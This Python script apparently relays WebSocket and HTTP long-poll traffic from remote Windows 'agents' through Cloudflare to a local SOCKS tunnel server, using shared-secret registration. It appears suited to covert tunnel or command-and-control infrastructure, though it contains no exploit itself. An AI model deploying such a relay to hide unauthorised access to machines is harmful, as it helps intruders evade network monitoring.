#!/usr/bin/env python3
"""
cf_bridge.py — Cloudflare HTTP/WebSocket to TCP bridge
Accepts:
  1. WebSocket connections (Win7+ agents)
  2. HTTP POST/GET polling (Win2003+ agents)
Forwards raw bytes to SOCKS tunnel server on localhost:443

HTTP Tunnel protocol:
  POST /tunnel/<session_id> — agent sends data (body = raw bytes)
  GET  /tunnel/<session_id> — agent receives data (response = raw bytes, long-poll)
  First POST with 64 bytes = registration (session_id + auth_hash)

WebSocket protocol:
  Upgrade to /ws — bidirectional binary frames
"""

import asyncio
import hashlib
import base64
import struct
import os
import json
import time
from collections import defaultdict

LISTEN_PORT = 4443
SOCKS_SERVER = ("127.0.0.1", 4444)
SHARED_SECRET = b"CHANGE_THIS_SECRET_KEY_32_CHARX"

# Load secret from config
import sys
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.txt")
if os.path.exists(config_path):
    for line in open(config_path):
        if line.strip().startswith("shared_secret"):
            SHARED_SECRET = line.split("=", 1)[1].strip().encode()
            break


class Session:
    """Represents an HTTP tunnel session (one agent)"""
    def __init__(self, session_id):
        self.session_id = session_id
        self.tcp_reader = None
        self.tcp_writer = None
        self.send_queue = asyncio.Queue()  # data to send to agent (GET responses)
        self.connected = False
        self.auth_complete = False
        self.last_activity = time.time()

sessions = {}  # session_id -> Session


async def connect_to_socks(session):
    """Establish TCP connection to the SOCKS tunnel server for this session"""
    try:
        session.tcp_reader, session.tcp_writer = await asyncio.open_connection(*SOCKS_SERVER)
        session.connected = True
        asyncio.create_task(auth_reader_task(session))
        return True
    except:
        return False



async def _readexactly(reader, n):
    data = b""
    while len(data) < n:
        chunk = await reader.read(n - len(data))
        if not chunk:
            return None
        data += chunk
    return data

async def auth_reader_task(session):
    print(f"[BRIDGE] auth_reader starting for {session.session_id}")
    """Read raw bytes during auth, then switch to framed mode"""
    try:
        # Auth phase: server sends 32-byte challenge
        challenge = await _readexactly(session.tcp_reader, 32)
        if not challenge:
            session.connected = False
            return
        await session.send_queue.put(challenge)
        print(f"[BRIDGE] queued {len(challenge)}-byte challenge")

        # Wait for server to send 4-byte CC20 confirmation
        cc20_resp = await _readexactly(session.tcp_reader, 4)
        if not cc20_resp:
            session.connected = False
            return
        await session.send_queue.put(cc20_resp)
        print(f"[BRIDGE] queued CC20 response: {cc20_resp}")

        session.auth_complete = True
        print(f"[BRIDGE] auth complete, switching to framed mode")
        # Switch to framed reading
        while session.connected:
            raw_len = await _readexactly(session.tcp_reader, 4)
            if not raw_len:
                break
            msg_len = int.from_bytes(raw_len, "big")
            if msg_len > 1048576 or msg_len == 0:
                break
            payload = await _readexactly(session.tcp_reader, msg_len)
            if not payload:
                break
            await session.send_queue.put(raw_len + payload)
    except:
        pass
    session.connected = False


def verify_auth(session_id_bytes, auth_hash):
    """Verify agent registration"""
    auth_msg = b"REG:" + session_id_bytes + SHARED_SECRET
    expected = hashlib.sha256(auth_msg).digest()
    return auth_hash == expected


async def handle_http(reader, writer):
    """Handle HTTP request (POST/GET for tunnel, or WebSocket upgrade)"""
    try:
        request = b""
        while b"\r\n\r\n" not in request:
            chunk = await asyncio.wait_for(reader.read(8192), timeout=30)
            if not chunk:
                writer.close()
                return
            request += chunk
            if len(request) > 16384:
                writer.close()
                return

        header_end = request.index(b"\r\n\r\n") + 4
        headers_raw = request[:header_end].decode("utf-8", errors="ignore")
        body_start = request[header_end:]
        
        lines = headers_raw.split("\r\n")
        method, path, _ = lines[0].split(" ", 2)
        
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip().lower()] = v.strip()

        # WebSocket upgrade
        if "upgrade" in headers and headers.get("upgrade", "").lower() == "websocket":
            await handle_websocket(reader, writer, headers)
            return

        # HTTP tunnel
        if path.startswith("/tunnel/"):
            session_id = path.split("/")[2] if len(path.split("/")) > 2 else ""
            
            # Read full body for POST
            content_length = int(headers.get("content-length", "0"))
            body = body_start
            while len(body) < content_length:
                chunk = await asyncio.wait_for(reader.read(content_length - len(body)), timeout=30)
                if not chunk:
                    break
                body += chunk

            if method == "POST":
                await handle_tunnel_post(writer, session_id, body)
            elif method == "GET":
                await handle_tunnel_get(writer, session_id)
            else:
                send_http_response(writer, 405, b"Method Not Allowed")
        else:
            send_http_response(writer, 404, b"Not Found")

    except Exception:
        pass
    finally:
        try:
            writer.close()
        except:
            pass


async def handle_tunnel_post(writer, session_id, body):
    """Agent sends data to server via POST"""
    
    # Registration: first POST with 64 bytes
    if session_id not in sessions and len(body) == 64:
        sid_bytes = body[:32]
        auth_hash = body[32:64]
        
        if not verify_auth(sid_bytes, auth_hash):
            send_http_response(writer, 403, b"Forbidden")
            return
        
        session = Session(session_id)
        sessions[session_id] = session
        
        if not await connect_to_socks(session):
            del sessions[session_id]
            send_http_response(writer, 502, b"Backend Error")
            return
        
        send_http_response(writer, 200, b"OK")
        return
    
    session = sessions.get(session_id)
    if not session or not session.connected:
        send_http_response(writer, 404, b"Session Not Found")
        return
    
    # Forward data to SOCKS server
    session.last_activity = time.time()
    try:
        session.tcp_writer.write(body)
        await session.tcp_writer.drain()
        send_http_response(writer, 200, b"OK")
    except:
        session.connected = False
        send_http_response(writer, 502, b"Backend Error")


async def handle_tunnel_get(writer, session_id):
    """Agent receives data from server via GET (long-poll)"""
    session = sessions.get(session_id)
    if not session or not session.connected:
        send_http_response(writer, 404, b"Session Not Found")
        return
    
    session.last_activity = time.time()
    
    # Wait for data (long-poll, max 25 seconds)
    try:
        data = await asyncio.wait_for(session.send_queue.get(), timeout=25)
        send_http_response(writer, 200, data)
    except asyncio.TimeoutError:
        # No data — send empty 204
        send_http_response(writer, 204, b"")
    except:
        send_http_response(writer, 502, b"Error")


def send_http_response(writer, status, body):
    status_text = {200: "OK", 204: "No Content", 403: "Forbidden", 404: "Not Found", 405: "Not Allowed", 502: "Bad Gateway"}
    resp = f"HTTP/1.1 {status} {status_text.get(status, 'Error')}\r\n"
    resp += f"Content-Length: {len(body)}\r\n"
    resp += "Content-Type: application/octet-stream\r\n"
    resp += "Connection: close\r\n\r\n"
    try:
        writer.write(resp.encode() + body)
    except:
        pass


# ===== WebSocket handling (same as before) =====

async def handle_websocket(reader, writer, headers):
    key = headers.get("sec-websocket-key", "")
    if not key:
        send_http_response(writer, 400, b"Bad Request")
        return
    
    magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
    accept = base64.b64encode(hashlib.sha1((key + magic).encode()).digest()).decode()
    
    response = (
        "HTTP/1.1 101 Switching Protocols\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Accept: {accept}\r\n\r\n"
    )
    writer.write(response.encode())
    await writer.drain()
    
    # Connect to SOCKS server
    try:
        tcp_reader, tcp_writer = await asyncio.open_connection(*SOCKS_SERVER)
    except:
        writer.close()
        return
    
    t1 = asyncio.create_task(ws_to_tcp(reader, writer, tcp_reader, tcp_writer))
    t2 = asyncio.create_task(tcp_to_ws(tcp_reader, writer))
    await asyncio.wait([t1, t2], return_when=asyncio.FIRST_COMPLETED)
    for t in [t1, t2]:
        t.cancel()
    try:
        tcp_writer.close()
    except:
        pass


async def ws_to_tcp(ws_reader, ws_writer, tcp_reader, tcp_writer):
    try:
        while True:
            header = await ws_reader.readexactly(2)
            masked = bool(header[1] & 0x80)
            length = header[1] & 0x7F
            if length == 126:
                length = struct.unpack(">H", await ws_reader.readexactly(2))[0]
            elif length == 127:
                length = struct.unpack(">Q", await ws_reader.readexactly(8))[0]
            mask_key = await ws_reader.readexactly(4) if masked else None
            data = await ws_reader.readexactly(length)
            if mask_key:
                data = bytearray(data)
                for i in range(len(data)):
                    data[i] ^= mask_key[i % 4]
                data = bytes(data)
            if header[0] & 0x0F == 0x08:
                break
            tcp_writer.write(data)
            await tcp_writer.drain()
    except:
        pass


async def tcp_to_ws(tcp_reader, ws_writer):
    try:
        while True:
            data = await tcp_reader.read(65536)
            if not data:
                break
            frame = bytearray()
            frame.append(0x82)  # FIN + binary
            if len(data) < 126:
                frame.append(len(data))
            elif len(data) < 65536:
                frame.append(126)
                frame.extend(struct.pack(">H", len(data)))
            else:
                frame.append(127)
                frame.extend(struct.pack(">Q", len(data)))
            frame.extend(data)
            ws_writer.write(bytes(frame))
            await ws_writer.drain()
    except:
        pass


# ===== Cleanup stale sessions =====
async def cleanup_task():
    while True:
        await asyncio.sleep(60)
        now = time.time()
        stale = [sid for sid, s in sessions.items() if now - s.last_activity > 120]
        for sid in stale:
            s = sessions.pop(sid, None)
            if s and s.tcp_writer:
                try:
                    s.tcp_writer.close()
                except:
                    pass


async def main():
    server = await asyncio.start_server(handle_http, "127.0.0.1", LISTEN_PORT)
    print(f"[*] CF Bridge: 127.0.0.1:{LISTEN_PORT} -> {SOCKS_SERVER[0]}:{SOCKS_SERVER[1]}")
    print(f"[*] Supports: WebSocket (/ws) + HTTP tunnel (/tunnel/<session>)")
    asyncio.create_task(cleanup_task())
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    print("[*] Cloudflare HTTP/WebSocket Bridge")
    asyncio.run(main())
